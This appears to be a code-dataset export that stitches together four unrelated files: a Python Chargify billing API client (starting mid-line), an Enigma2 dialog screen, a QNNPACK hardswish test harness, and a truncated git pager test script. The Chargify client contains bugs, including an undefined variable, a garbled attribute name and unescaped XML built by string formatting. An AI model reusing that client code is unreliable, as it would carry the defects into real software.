(str(parent_id), str(sub_id)))]) + _a)),
self.__name__, self.__xmlnodename__)
raise NotImplementedError('Subclass is missing Meta class attribute compound key')
class ChargifyCustomer(ChargifyBase):
"""
Represents Chargify Customers
@license GNU General Public License
"""
class Meta:
paged = True
listing = 'customers'
__name__ = 'ChargifyCustomer'
__attribute_types__ = {}
__xmlnodename__ = 'customer'
id = None
first_name = ''
last_name = ''
email = ''
organization = ''
reference = ''
created_at = None
modified_at = None
def __init__(self, apikey, subdomain):
super(ChargifyCustomer, self).__init__(apikey, subdomain)
self.getByReference = lambda v: self.__get_by_attribute__('reference', v)
def getSubscriptions(self):
obj = ChargifySubscription(self.api_key, self.sub_domain)
return obj.getByCustomerId(self.id)
def _toxml(self, dom):
"""
Return a XML Representation of the object
"""
if self.id not in [None, 'None']:
element = minidom.Element("customer_id")
node_txt = dom.createTextNode(str(self.id))
element.appendChild(node_txt)
return element
else:
return super(ChargifyCustomer, self)._toxml(dom)
class CustomerAttributes(ChargifyCustomer):
__xmlnodename__ = 'customer_attributes'
class ChargifyProductFamily(ChargifyBase):
"""
Represents Chargify Product Families
@license GNU General Public License
"""
class Meta:
listing = 'product_families'
__name__ = 'ChargifyProductFamily'
__attribute_types__ = {}
__xmlnodename__ = 'product_family'
id = None
accounting_code = None
description = ''
handle = ''
name = ''
def getComponents(self):
obj = ChargifyProductFamilyComponent(self.api_key, self.sub_domain)
return obj.getByProductFamilyId(self.id)
class ChargifyProductFamilyComponent(ChargifyBase):
__name__ = 'ChargifyProductFamilyComponent'
__attribute_types__ = {}
__xmlnodename__ = 'component'
class Meta:
listing = 'components'
id = None
name = ''
kind = ''
product_family_id = 0
price_per_unit_in_cents = 0
pricing_scheme = ''
unit_name = None
updated_at = None
created_at = None
def getByProductFamilyId(self, id):
return self._applyA(self._get('/product_families/' + str(id) + '/components.xml'),
self.__name__, self.__xmlnodename__)
def getByIds(self, product_family_id, id):
result = None
url = '/product_families/' + str(product_family_id) + '/components.xml'
components = self._applyA(
self._get(url), self.__name__, self.__xmlnodename__)
if components:
filtered = filter(lambda c: c.id==str(id), components)
if len(filtered) > 0:
result = filtered[0]
return result
class ChargifyProduct(ChargifyBase):
"""
Represents Chargify Products
@license GNU General Public License
"""
class Meta:
listing = 'products'
__name__ = 'ChargifyProduct'
__attribute_types__ = {
'product_family': 'ChargifyProductFamily',
}
__xmlnodename__ = 'product'
id = None
price_in_cents = 0
name = ''
handle = ''
product_family = None
accounting_code = ''
interval_unit = ''
interval = 0
def getByHandle(self, handle):
return self._applyS(self._get('/products/handle/' + str(handle) +
'.xml'), self.__name__, self.__xmlnodename__)
def getPaymentPageUrl(self):
return ('https://' + self.request_host + '/h/' +
self.id + '/subscriptions/new')
def getPriceInDollars(self):
return round(float(self.price_in_cents) / 100, 2)
def getFormattedPrice(self):
return "$%.2f" % (self.getPriceInDollars())
class ChargifySubscription(ChargifyBase):
"""
Represents Chargify Subscriptions
@license GNU General Public License
"""
class Meta:
listing = 'subscriptions'
paged = True
__name__ = 'ChargifySubscription'
__attribute_types__ = {
'customer': 'ChargifyCustomer',
'product': 'ChargifyProduct',
'credit_card': 'ChargifyCreditCard',
'components': 'ChargifySubscriptionComponent',
}
__xmlnodename__ = 'subscription'
id = None
state = ''
coupon_code = ''
balance_in_cents = 0
current_period_started_at = None
current_period_ends_at = None
trial_started_at = None
trial_ended_attrial_ended_at = None
activated_at = None
expires_at = None
created_at = None
updated_at = None
customer = None
customer_reference = ''
product = None
product_handle = ''
credit_card = None
components = None
def getComponents(self):
"""
Gets the subscription components
"""
if self.id not in [None, 'None']:
obj = ChargifySubscriptionComponent(self.api_key, self.sub_domain)
return obj.getBySubscriptionId(self.id)
def getComponent(self, component_id):
"""
Gets a subscription component..
"""
obj = ChargifySubscriptionComponent(self.api_key, self.sub_domain)
return obj.getByCompoundKey(self.id, component_id)
def getByCustomerId(self, customer_id):
return self._applyA(self._get('/customers/' + str(customer_id) +
'/subscriptions.xml'), self.__name__, 'subscription')
def getBySubscriptionId(self, subscription_id):
#Throws error if more than element is returned
i, = self._applyA(self._get('/subscriptions/' + str(subscription_id) +
'.xml'), self.__name__, 'subscription')
return i
def resetBalance(self):
self._put("/subscriptions/" + self.id + "/reset_balance.xml", '')
def reactivate(self):
self._put("/subscriptions/" + self.id + "/reactivate.xml", "")
def upgrade(self, toProductHandle):
xml = """<?xml version="1.0" encoding="UTF-8"?>
<subscription>
<product_handle>%s</product_handle>
</subscription>""" % (toProductHandle)
#end improper indentation
return self._applyS(self._put("/subscriptions/" + self.id + ".xml",
xml), self.__name__, "subscription")
def unsubscribe(self, message):
xml = """<?xml version="1.0" encoding="UTF-8"?>
<subscription>
<cancellation_message>
%s
</cancellation_message>
</subscription>""" % (message)
self._delete("/subscriptions/" + self.id + ".xml", xml)
def charge(self, amount, memo):
xml = """<?xml version="1.0" encoding="UTF-8"?>
<charge>
<amount>%s</amount>
<memo>%s</memo>
</charge>""" % (amount, memo)
self._post('/subscriptions/' + self.id + '/charges.xml', xml)
class ChargifyCreditCard(ChargifyBase):
"""
Represents Chargify Credit Cards
"""
__name__ = 'ChargifyCreditCard'
__attribute_types__ = {}
__xmlnodename__ = 'credit_card_attributes'
first_name = ''
last_name = ''
full_number = ''
masked_card_number = ''
expiration_month = ''
expiration_year = ''
cvv = ''
type = ''
billing_address = ''
billing_city = ''
billing_state = ''
billing_zip = ''
billing_country = ''
def save(self, subscription):
path = "/subscriptions/%s.xml" % (subscription.id)
data = u'<?xml version="1.0" encoding="UTF-8"?><subscription><credit_card_attributes>%s</credit_card_attributes></subscription>' % (
''.join([u'<%s>%s</%s>' % (k, v, k) for (k, v) in self.__dict__.items()
if not k.startswith('_') and k not in self.__ignore__]))
return self._applyS(self._put(path, data),
self.__name__, "subscription")
class ChargifySubscriptionComponent(ChargifyBase, CompoundKeyMixin):
"""
Represents Chargify Subscription Component
"""
class Meta:
compound_key = ('subscriptions', 'components')
__name__ = 'ChargifySubscriptionComponent'
__attribute_types__ = {}
__xmlnodename__ = 'component'
component_id = None
subscription_id = None
name = ''
kind = ''
unit_name = None
unit_balance = 0 # metered-component
allocated_quantity = 0 # quantity-based-component
pricing_scheme = '' # quantity-based-component
enabled = False # on-off-component
def _toxml(self, dom):
"""
Return a XML Representation of the object
"""
if self.kind == 'metered_component':
return None
if self.kind == 'on_off_component':
property = 'enabled'
else:
property = 'allocated_quantity'
value = getattr(self, property)
if not value:
return None
element = minidom.Element(self.__xmlnodename__)
node = minidom.Element('component_id')
node_txt = dom.createTextNode(str(self.component_id))
node.appendChild(node_txt)
element.appendChild(node)
node = minidom.Element(property)
node_txt = dom.createTextNode(str(value))
node.appendChild(node_txt)
element.appendChild(node)
return element
def getBySubscriptionId(self, id):
return self._applyA(self._get('/subscriptions/' + str(id) + '/components.xml'),
self.__name__, self.__xmlnodename__)
def updateQuantity(self, quantity):
"""
Sets the quantity allocation for a given component id.
"""
if self.component_id is None or self.subscription_id is None:
raise ChargifyError()
if self.kind != 'quantity_based_component':
raise ChargifyError()
self.allocated_quantity = quantity
data = '''<?xml version="1.0" encoding="UTF-8"?><component>
<allocated_quantity type="integer">%d</allocated_quantity>
</component>''' % self.allocated_quantity
dom = minidom.parseString(self.fix_xml_encoding(
self._put('/subscriptions/%s/components/%s.xml' % (
str(self.subscription_id), str(self.component_id)), data)
))
def updateOnOff(self, enable):
"""
Sets the enabled attr for a given component id.
"""
if self.component_id is None or self.subscription_id is None:
raise ChargifyError()
if self.kind != 'on_off_component':
raise ChargifyError()
self.enabled = enabled
data = '''<?xml version="1.0" encoding="UTF-8"?><component>
<allocated_quantity>%s</allocated_quantity>
</component>''' % self.enabled
dom = minidom.parseString(self.fix_xml_encoding(
self._put('/subscriptions/%s/components/%s.xml' % (
str(self.subscription_id), str(self.component_id)), data)
))
def getUsages(self):
"""
Gets the subscription component usages
"""
if self.component_id is None or self.subscription_id is None:
raise ChargifyError()
if self.kind != 'metered_component':
raise ChargifyError()
obj = ChargifyComponentUsage(self.api_key, self.sub_domain)
return obj.getByCompoundKey(self.subscription_id, self.component_id)
def createUsage(self, quantity, memo=None):
"""
Creates metered usage for a given component id.
"""
if self.component_id is None or self.subscription_id is None:
raise ChargifyError()
if self.kind != 'metered_component':
raise ChargifyError()
data = '''<?xml version="1.0" encoding="UTF-8"?><usage>
<quantity>%d</quantity><memo>%s</memo></usage>''' % (
quantity, memo or "")
return self._applyA(
self._post('/subscriptions/%s/components/%s/usages.xml' % (
str(self.subscription_id), str(self.component_id)), data),
ChargifyComponentUsage.__name__,
ChargifyComponentUsage.__xmlnodename__)
class ChargifyComponentUsage(ChargifyBase, CompoundKeyMixin):
"""
Represents Chargify Subscription Component Usage
"""
class Meta:
compound_key = ('subscriptions', 'components', 'usages')
__name__ = 'ChargifyComponentUsage'
__attribute_types__ = {}
__xmlnodename__ = 'usage'
id = None
quantity = 0
memo = ''
class ChargifyPostBack(ChargifyBase):
"""
Represents Chargify API Post Backs
@license GNU General Public License
"""
subscriptions = []
def __init__(self, apikey, subdomain, postback_data):
ChargifyBase.__init__(apikey, subdomain)
if postback_data:
self._process_postback_data(postback_data)
def _process_postback_data(self, data):
"""
Process the Json array and fetches the Subscription Objects
"""
csub = ChargifySubscription(self.api_key, self.sub_domain)
postdata_objects = json.loads(data)
for obj in postdata_objects:
self.subscriptions.append(csub.getBySubscriptionId(obj))
class Chargify:
"""
The Chargify class provides the main entry point to the Charify API
@license GNU General Public License
"""
api_key = ''
sub_domain = ''
def __init__(self, apikey, subdomain):
self.api_key = apikey
self.sub_domain = subdomain
def Customer(self):
return ChargifyCustomer(self.api_key, self.sub_domain)
def CustomerAttributes(self):
return CustomerAttributes(self.api_key, self.sub_domain)
def Product(self):
return ChargifyProduct(self.api_key, self.sub_domain)
def Component(self):
return ChargifyProductFamilyComponent(self.api_key,
self.sub_domain)
def ProductFamily(self):
return ChargifyProductFamily(self.api_key, self.sub_domain)
def Subscription(self):
return ChargifySubscription(self.api_key, self.sub_domain)
def SubscriptionComponent(self):
return ChargifySubscriptionComponent(self.api_key,
self.sub_domain)
def ComponentUsage(self):
return ChargifyComponentUsage(self.api_key, self.sub_domain)
def CreditCard(self):
return ChargifyCreditCard(self.api_key, self.sub_domain)
def PostBack(self, postbackdata):
return ChargifyPostBack(self.api_key, self.sub_domain, postbackdata)
@property
def Customers(self):
return ChargifyCustomer(self.api_key, self.sub_domain)
@property
def Products(self):
return ChargifyProduct(self.api_key, self.sub_domain)
@property
def Components(self):
return ChargifyProductFamilyComponent(self.api_key, self.sub_domain)
@property
def ProductFamilies(self):
return ChargifyProductFamily(self.api_key, self.sub_domain)
@property
def Subscriptions(self):
return ChargifySubscription(self.api_key, self.sub_domain)
@property
def SubscriptionComponents(self):
return ChargifySubscriptionComponent(self.api_key, self.sub_domain)
@property
def ComponentUsages(self):
return ChargifyComponentUsage(self.api_key, self.sub_domain)
|
unknown
|
codeparrot/codeparrot-clean
| ||
from enigma import *
from Screens.Screen import Screen
from Components.ActionMap import ActionMap
from Components.Sources.List import List
from Tools.Directories import resolveFilename, SCOPE_CURRENT_PLUGIN
from Tools.LoadPixmap import LoadPixmap
from Components.Label import Label
def MessageBoxEntry(name, picture):
pixmap = LoadPixmap(cached = True, path = resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/DeviceManager/icons/" + picture));
if not pixmap:
pixmap = LoadPixmap(cached = True, path = resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/DeviceManager/icons/empty.png"));
return (pixmap, name)
class ExtraMessageBox(Screen):
skin = """
<screen name="ExtraMessageBox" position="center,center" size="460,430" title=" ">
<widget name="message" position="10,10" size="440,25" font="Regular;20" />
<widget source="menu" render="Listbox" position="20,90" size="420,360" scrollbarMode="showOnDemand">
<convert type="TemplatedMultiContent">
{"template": [
MultiContentEntryPixmapAlphaTest(pos = (5, 0), size = (48, 48), png = 0),
MultiContentEntryText(pos = (65, 10), size = (425, 38), font=0, flags = RT_HALIGN_LEFT|RT_VALIGN_TOP, text = 1),
],
"fonts": [gFont("Regular", 22)],
"itemHeight": 48
}
</convert>
</widget>
<applet type="onLayoutFinish">
# this should be factored out into some helper code, but currently demonstrates applets.
from enigma import eSize, ePoint
orgwidth = self.instance.size().width()
orgheight = self.instance.size().height()
orgpos = self.instance.position()
textsize = self["message"].getSize()
# y size still must be fixed in font stuff...
if self["message"].getText() != "":
textsize = (textsize[0] + 80, textsize[1] + 60)
else:
textsize = (textsize[0] + 80, textsize[1] + 4)
count = len(self.list)
if count > 7:
count = 7
offset = 48 * count
wsizex = textsize[0] + 80
wsizey = textsize[1] + offset + 20
if (460 > wsizex):
wsizex = 460
wsize = (wsizex, wsizey)
# resize
self.instance.resize(eSize(*wsize))
# resize label
self["message"].instance.resize(eSize(*textsize))
# move list
listsize = (wsizex - 20, 48 * count)
self["menu"].downstream_elements.downstream_elements.instance.move(ePoint(10, textsize[1] + 10))
self["menu"].downstream_elements.downstream_elements.instance.resize(eSize(*listsize))
# center window
newwidth = wsize[0]
newheight = wsize[1]
self.instance.move(ePoint(orgpos.x() + (orgwidth - newwidth)/2, orgpos.y() + (orgheight - newheight)/2))
</applet>
</screen>"""
def __init__(self, session, message = "", title = "", menulist = [], type = 0, exitid = -1, default = 0, timeout = 0):
# type exist for compability... will be ignored
Screen.__init__(self, session)
self.session = session
self.ctitle = title
self.exitid = exitid
self.default = default
self.timeout = timeout
self.elapsed = 0
self.list = []
for item in menulist:
self.list.append(MessageBoxEntry(item[0], item[1]))
self['menu'] = List(self.list)
self["menu"].onSelectionChanged.append(self.selectionChanged)
self["message"] = Label(message)
self["actions"] = ActionMap(["SetupActions"],
{
"ok": self.ok,
"cancel": self.cancel
}, -2)
self.onLayoutFinish.append(self.layoutFinished)
self.timer = eTimer()
self.timer.callback.append(self.timeoutStep)
if self.timeout > 0:
self.timer.start(1000, 1)
def selectionChanged(self):
self.timer.stop()
self.setTitle(self.ctitle)
def timeoutStep(self):
self.elapsed += 1
if self.elapsed == self.timeout:
self.ok()
else:
self.setTitle("%s - %d" % (self.ctitle, self.timeout - self.elapsed))
self.timer.start(1000, 1)
def layoutFinished(self):
if self.timeout > 0:
self.setTitle("%s - %d" % (self.ctitle, self.timeout))
else:
self.setTitle(self.ctitle)
self['menu'].setCurrentIndex(self.default)
def ok(self):
index = self['menu'].getIndex()
self.close(index)
def cancel(self):
if self.exitid > -1:
self.close(self.exitid)
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Copyright (c) Facebook, Inc. and its affiliates.
* All rights reserved.
*
* This source code is licensed under the BSD-style license found in the
* LICENSE file in the root directory of this source tree.
*/
#pragma once
#include <algorithm>
#include <cassert>
#include <cmath>
#include <cstddef>
#include <cstdlib>
#include <functional>
#include <random>
#include <vector>
#include <pytorch_qnnpack.h>
class HardswishOperatorTester {
public:
inline HardswishOperatorTester& channels(size_t channels) {
assert(channels != 0);
this->channels_ = channels;
return *this;
}
inline size_t channels() const {
return this->channels_;
}
inline HardswishOperatorTester& inputStride(size_t inputStride) {
assert(inputStride != 0);
this->inputStride_ = inputStride;
return *this;
}
inline size_t inputStride() const {
if (this->inputStride_ == 0) {
return this->channels_;
} else {
assert(this->inputStride_ >= this->channels_);
return this->inputStride_;
}
}
inline HardswishOperatorTester& outputStride(size_t outputStride) {
assert(outputStride != 0);
this->outputStride_ = outputStride;
return *this;
}
inline size_t outputStride() const {
if (this->outputStride_ == 0) {
return this->channels_;
} else {
assert(this->outputStride_ >= this->channels_);
return this->outputStride_;
}
}
inline HardswishOperatorTester& batchSize(size_t batchSize) {
this->batchSize_ = batchSize;
return *this;
}
inline size_t batchSize() const {
return this->batchSize_;
}
inline HardswishOperatorTester& inputScale(float inputScale) {
assert(inputScale > 0.0f);
assert(std::isnormal(inputScale));
this->inputScale_ = inputScale;
return *this;
}
inline float inputScale() const {
return this->inputScale_;
}
inline HardswishOperatorTester& inputZeroPoint(uint8_t inputZeroPoint) {
this->inputZeroPoint_ = inputZeroPoint;
return *this;
}
inline uint8_t inputZeroPoint() const {
return this->inputZeroPoint_;
}
inline HardswishOperatorTester& outputScale(float outputScale) {
assert(outputScale > 0.0f);
assert(std::isnormal(outputScale));
this->outputScale_ = outputScale;
return *this;
}
inline float outputScale() const {
return this->outputScale_;
}
inline HardswishOperatorTester& outputZeroPoint(uint8_t outputZeroPoint) {
this->outputZeroPoint_ = outputZeroPoint;
return *this;
}
inline uint8_t outputZeroPoint() const {
return this->outputZeroPoint_;
}
inline HardswishOperatorTester& qmin(uint8_t qmin) {
this->qmin_ = qmin;
return *this;
}
inline uint8_t qmin() const {
return this->qmin_;
}
inline HardswishOperatorTester& qmax(uint8_t qmax) {
this->qmax_ = qmax;
return *this;
}
inline uint8_t qmax() const {
return this->qmax_;
}
inline HardswishOperatorTester& iterations(size_t iterations) {
this->iterations_ = iterations;
return *this;
}
inline size_t iterations() const {
return this->iterations_;
}
void testQ8() const {
std::random_device randomDevice;
auto rng = std::mt19937(randomDevice());
auto u8rng = std::bind(std::uniform_int_distribution<uint8_t>(), rng);
std::vector<uint8_t> input((batchSize() - 1) * inputStride() + channels());
std::vector<uint8_t> output(
(batchSize() - 1) * outputStride() + channels());
std::vector<float> outputRef(batchSize() * channels());
for (size_t iteration = 0; iteration < iterations(); iteration++) {
std::generate(input.begin(), input.end(), std::ref(u8rng));
std::fill(output.begin(), output.end(), 0xA5);
/* Compute reference results */
for (size_t i = 0; i < batchSize(); i++) {
for (size_t c = 0; c < channels(); c++) {
const float x = inputScale() *
(int32_t(input[i * inputStride() + c]) -
int32_t(inputZeroPoint()));
const float hardswishX =
x * std::min(std::max(x + 3.0f, 0.0f), 6.0f) / 6.0f;
const float scaledHardswishX = hardswishX / outputScale();
float y = scaledHardswishX;
y = std::min<float>(y, int32_t(qmax()) - int32_t(outputZeroPoint()));
y = std::max<float>(y, int32_t(qmin()) - int32_t(outputZeroPoint()));
outputRef[i * channels() + c] = y + int32_t(outputZeroPoint());
}
}
/* Create, setup, run, and destroy Hardswish operator */
ASSERT_EQ(pytorch_qnnp_status_success, pytorch_qnnp_initialize());
pytorch_qnnp_operator_t hardswishOp = nullptr;
ASSERT_EQ(
pytorch_qnnp_status_success,
pytorch_qnnp_create_hardswish_nc_q8(
channels(),
inputZeroPoint(),
inputScale(),
outputZeroPoint(),
outputScale(),
qmin(),
qmax(),
0,
&hardswishOp));
ASSERT_NE(nullptr, hardswishOp);
ASSERT_EQ(
pytorch_qnnp_status_success,
pytorch_qnnp_setup_hardswish_nc_q8(
hardswishOp,
batchSize(),
input.data(),
inputStride(),
output.data(),
outputStride()));
ASSERT_EQ(
pytorch_qnnp_status_success,
pytorch_qnnp_run_operator(hardswishOp, nullptr /* thread pool */));
ASSERT_EQ(
pytorch_qnnp_status_success, pytorch_qnnp_delete_operator(hardswishOp));
hardswishOp = nullptr;
/* Verify results */
for (size_t i = 0; i < batchSize(); i++) {
for (size_t c = 0; c < channels(); c++) {
ASSERT_NEAR(
float(int32_t(output[i * outputStride() + c])),
outputRef[i * channels() + c],
0.6f);
}
}
}
}
private:
size_t batchSize_{1};
size_t channels_{1};
size_t inputStride_{0};
size_t outputStride_{0};
float inputScale_{0.75f};
uint8_t inputZeroPoint_{121};
float outputScale_{0.75f};
uint8_t outputZeroPoint_{121};
uint8_t qmin_{0};
uint8_t qmax_{255};
size_t iterations_{15};
};
|
c
|
github
|
https://github.com/pytorch/pytorch
|
aten/src/ATen/native/quantized/cpu/qnnpack/test/hardswish-operator-tester.h
|
#!/bin/sh
test_description='Test automatic use of a pager.'
. ./test-lib.sh
. "$TEST_DIRECTORY"/lib-pager.sh
. "$TEST_DIRECTORY"/lib-terminal.sh
test_expect_success 'setup' '
sane_unset GIT_PAGER GIT_PAGER_IN_USE &&
test_unconfig core.pager &&
PAGER="cat >paginated.out" &&
export PAGER &&
test_commit initial
'
test_expect_success TTY 'some commands use a pager' '
rm -f paginated.out &&
test_terminal git log &&
test_path_is_file paginated.out
'
test_expect_failure TTY 'pager runs from subdir' '
echo subdir/paginated.out >expected &&
mkdir -p subdir &&
rm -f paginated.out subdir/paginated.out &&
(
cd subdir &&
test_terminal git log
) &&
{
ls paginated.out subdir/paginated.out ||
:
} >actual &&
test_cmp expected actual
'
test_expect_success TTY 'LESS and LV envvars are set for pagination' '
(
sane_unset LESS LV &&
PAGER="env >pager-env.out; wc" &&
export PAGER &&
test_terminal git log
) &&
grep ^LESS= pager-env.out &&
grep ^LV= pager-env.out
'
test_expect_success !MINGW,TTY 'LESS and LV envvars set by git-sh-setup' '
(
sane_unset LESS LV &&
PAGER="env >pager-env.out; wc" &&
export PAGER &&
PATH="$(git --exec-path):$PATH" &&
export PATH &&
test_terminal sh -c ". git-sh-setup && git_pager"
) &&
grep ^LESS= pager-env.out &&
grep ^LV= pager-env.out
'
test_expect_success TTY 'some commands do not use a pager' '
rm -f paginated.out &&
test_terminal git rev-list HEAD &&
test_path_is_missing paginated.out
'
test_expect_success 'no pager when stdout is a pipe' '
rm -f paginated.out &&
git log | cat &&
test_path_is_missing paginated.out
'
test_expect_success 'no pager when stdout is a regular file' '
rm -f paginated.out &&
git log >file &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git --paginate rev-list uses a pager' '
rm -f paginated.out &&
test_terminal git --paginate rev-list HEAD &&
test_path_is_file paginated.out
'
test_expect_success 'no pager even with --paginate when stdout is a pipe' '
rm -f file paginated.out &&
git --paginate log | cat &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'no pager with --no-pager' '
rm -f paginated.out &&
test_terminal git --no-pager log &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'configuration can disable pager' '
rm -f paginated.out &&
test_unconfig pager.grep &&
test_terminal git grep initial &&
test_path_is_file paginated.out &&
rm -f paginated.out &&
test_config pager.grep false &&
test_terminal git grep initial &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'configuration can enable pager (from subdir)' '
rm -f paginated.out &&
mkdir -p subdir &&
test_config pager.bundle true &&
git bundle create test.bundle --all &&
rm -f paginated.out subdir/paginated.out &&
(
cd subdir &&
test_terminal git bundle unbundle ../test.bundle
) &&
{
test_path_is_file paginated.out ||
test_path_is_file subdir/paginated.out
}
'
test_expect_success TTY 'git tag -l defaults to paging' '
rm -f paginated.out &&
test_terminal git tag -l &&
test_path_is_file paginated.out
'
test_expect_success TTY 'git tag -l respects pager.tag' '
rm -f paginated.out &&
test_terminal git -c pager.tag=false tag -l &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git tag -l respects --no-pager' '
rm -f paginated.out &&
test_terminal git -c pager.tag --no-pager tag -l &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git tag with no args defaults to paging' '
# no args implies -l so this should page like -l
rm -f paginated.out &&
test_terminal git tag &&
test_path_is_file paginated.out
'
test_expect_success TTY 'git tag with no args respects pager.tag' '
# no args implies -l so this should page like -l
rm -f paginated.out &&
test_terminal git -c pager.tag=false tag &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git tag --contains defaults to paging' '
# --contains implies -l so this should page like -l
rm -f paginated.out &&
test_terminal git tag --contains &&
test_path_is_file paginated.out
'
test_expect_success TTY 'git tag --contains respects pager.tag' '
# --contains implies -l so this should page like -l
rm -f paginated.out &&
test_terminal git -c pager.tag=false tag --contains &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git tag -a defaults to not paging' '
test_when_finished "git tag -d newtag" &&
rm -f paginated.out &&
test_terminal git tag -am message newtag &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git tag -a ignores pager.tag' '
test_when_finished "git tag -d newtag" &&
rm -f paginated.out &&
test_terminal git -c pager.tag tag -am message newtag &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git tag -a respects --paginate' '
test_when_finished "git tag -d newtag" &&
rm -f paginated.out &&
test_terminal git --paginate tag -am message newtag &&
test_path_is_file paginated.out
'
test_expect_success TTY 'git tag as alias ignores pager.tag with -a' '
test_when_finished "git tag -d newtag" &&
rm -f paginated.out &&
test_terminal git -c pager.tag -c alias.t=tag t -am message newtag &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git tag as alias respects pager.tag with -l' '
rm -f paginated.out &&
test_terminal git -c pager.tag=false -c alias.t=tag t -l &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git branch defaults to paging' '
rm -f paginated.out &&
test_terminal git branch &&
test_path_is_file paginated.out
'
test_expect_success TTY 'git branch respects pager.branch' '
rm -f paginated.out &&
test_terminal git -c pager.branch=false branch &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git branch respects --no-pager' '
rm -f paginated.out &&
test_terminal git --no-pager branch &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git branch --edit-description ignores pager.branch' '
rm -f paginated.out editor.used &&
write_script editor <<-\EOF &&
echo "New description" >"$1"
touch editor.used
EOF
EDITOR=./editor test_terminal git -c pager.branch branch --edit-description &&
test_path_is_missing paginated.out &&
test_path_is_file editor.used
'
test_expect_success TTY 'git branch --set-upstream-to ignores pager.branch' '
rm -f paginated.out &&
git branch other &&
test_when_finished "git branch -D other" &&
test_terminal git -c pager.branch branch --set-upstream-to=other &&
test_when_finished "git branch --unset-upstream" &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git config ignores pager.config when setting' '
rm -f paginated.out &&
test_terminal git -c pager.config config foo.bar bar &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git config --edit ignores pager.config' '
rm -f paginated.out editor.used &&
write_script editor <<-\EOF &&
touch editor.used
EOF
EDITOR=./editor test_terminal git -c pager.config config --edit &&
test_path_is_missing paginated.out &&
test_path_is_file editor.used
'
test_expect_success TTY 'git config --get ignores pager.config' '
rm -f paginated.out &&
test_terminal git -c pager.config config --get foo.bar &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git config --get-urlmatch defaults to paging' '
rm -f paginated.out &&
test_terminal git -c http."https://foo.com/".bar=foo \
config --get-urlmatch http https://foo.com &&
test_path_is_file paginated.out
'
test_expect_success TTY 'git config --get-all respects pager.config' '
rm -f paginated.out &&
test_terminal git -c pager.config=false config --get-all foo.bar &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git config --list defaults to paging' '
rm -f paginated.out &&
test_terminal git config --list &&
test_path_is_file paginated.out
'
# A colored commit log will begin with an appropriate ANSI escape
# for the first color; the text "commit" comes later.
colorful() {
read firstline <$1
! expr "$firstline" : "[a-zA-Z]" >/dev/null
}
test_expect_success 'tests can detect color' '
rm -f colorful.log colorless.log &&
git log --no-color >colorless.log &&
git log --color >colorful.log &&
! colorful colorless.log &&
colorful colorful.log
'
test_expect_success 'no color when stdout is a regular file' '
rm -f colorless.log &&
test_config color.ui auto &&
git log >colorless.log &&
! colorful colorless.log
'
test_expect_success TTY 'color when writing to a pager' '
rm -f paginated.out &&
test_config color.ui auto &&
test_terminal git log &&
colorful paginated.out
'
test_expect_success TTY 'colors are suppressed by color.pager' '
rm -f paginated.out &&
test_config color.ui auto &&
test_config color.pager false &&
test_terminal git log &&
! colorful paginated.out
'
test_expect_success 'color when writing to a file intended for a pager' '
rm -f colorful.log &&
test_config color.ui auto &&
(
TERM=vt100 &&
GIT_PAGER_IN_USE=true &&
export TERM GIT_PAGER_IN_USE &&
git log >colorful.log
) &&
colorful colorful.log
'
test_expect_success TTY 'colors are sent to pager for external commands' '
test_config alias.externallog "!git log" &&
test_config color.ui auto &&
test_terminal git -p externallog &&
colorful paginated.out
'
# Use this helper to make it easy for the caller of your
# terminal-using function to specify whether it should fail.
# If you write
#
# your_test() {
# parse_args "$@"
#
# $test_expectation "$cmd - behaves well" "
# ...
# $full_command &&
# ...
# "
# }
#
# then your test can be used like this:
#
# your_test expect_(success|failure) [test_must_fail] 'git foo'
#
parse_args() {
test_expectation="test_$1"
shift
if test "$1" = test_must_fail
then
full_command="test_must_fail test_terminal "
shift
else
full_command="test_terminal "
fi
cmd=$1
full_command="$full_command $1"
}
test_default_pager() {
parse_args "$@"
$test_expectation SIMPLEPAGER,TTY "$cmd - default pager is used by default" "
sane_unset PAGER GIT_PAGER &&
test_unconfig core.pager &&
rm -f default_pager_used &&
cat >\$less <<-\EOF &&
#!/bin/sh
wc >default_pager_used
EOF
chmod +x \$less &&
(
PATH=.:\$PATH &&
export PATH &&
$full_command
) &&
test_path_is_file default_pager_used
"
}
test_PAGER_overrides() {
parse_args "$@"
$test_expectation TTY "$cmd - PAGER overrides default pager" "
sane_unset GIT_PAGER &&
test_unconfig core.pager &&
rm -f PAGER_used &&
PAGER='wc >PAGER_used' &&
export PAGER &&
$full_command &&
test_path_is_file PAGER_used
"
}
test_core_pager_overrides() {
if_local_config=
used_if_wanted='overrides PAGER'
test_core_pager "$@"
}
test_local_config_ignored() {
if_local_config='! '
used_if_wanted='is not used'
test_core_pager "$@"
}
test_core_pager() {
parse_args "$@"
$test_expectation TTY "$cmd - repository-local core.pager setting $used_if_wanted" "
sane_unset GIT_PAGER &&
rm -f core.pager_used &&
PAGER=wc &&
export PAGER &&
test_config core.pager 'wc >core.pager_used' &&
$full_command &&
${if_local_config}test_path_is_file core.pager_used
"
}
test_core_pager_subdir() {
if_local_config=
used_if_wanted='overrides PAGER'
test_pager_subdir_helper "$@"
}
test_no_local_config_subdir() {
if_local_config='! '
used_if_wanted='is not used'
test_pager_subdir_helper "$@"
}
test_pager_subdir_helper() {
parse_args "$@"
$test_expectation TTY "$cmd - core.pager $used_if_wanted from subdirectory" "
sane_unset GIT_PAGER &&
rm -f core.pager_used &&
rm -fr sub &&
PAGER=wc &&
stampname=\$(pwd)/core.pager_used &&
export PAGER stampname &&
test_config core.pager 'wc >\"\$stampname\"' &&
mkdir sub &&
(
cd sub &&
